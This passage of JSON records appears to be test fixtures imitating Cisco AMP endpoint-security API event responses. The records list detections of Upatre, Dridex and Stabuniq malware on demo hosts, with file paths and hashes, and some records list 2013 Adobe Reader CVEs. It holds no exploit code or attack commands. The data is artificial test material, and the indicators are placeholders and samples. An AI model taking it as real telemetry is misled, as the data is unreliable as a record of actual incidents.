Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263623","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263622","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263621","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":673000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263620","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263619","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":627000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207844921180000,"timestamp":1610704822,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:00:22+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207844921180170","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659264906658000,"timestamp":1610704820,"timestamp_nanoseconds":460000000,"date":"2021-01-15T10:00:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659264906657801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361224000800,"timestamp":1610704819,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:00:19+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"Win.Trojan.Upatre.tht.VRT","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704819,"start_date":"2021-01-15T10:00:19+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331413502427000,"timestamp":1610704818,"timestamp_nanoseconds":57000000,"date":"2021-01-15T10:00:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331409207459841","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614973673406000,"timestamp":1610704817,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:17+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1185,"scanned_processes":22,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207810561442000,"timestamp":1610704814,"timestamp_nanoseconds":961000000,"date":"2021-01-15T10:00:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207810561441801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207806266474000,"timestamp":1610704813,"timestamp_nanoseconds":963000000,"date":"2021-01-15T10:00:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207806266474504","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.cab","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\4543543.cab","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":777000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507207","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":179000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984840","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program 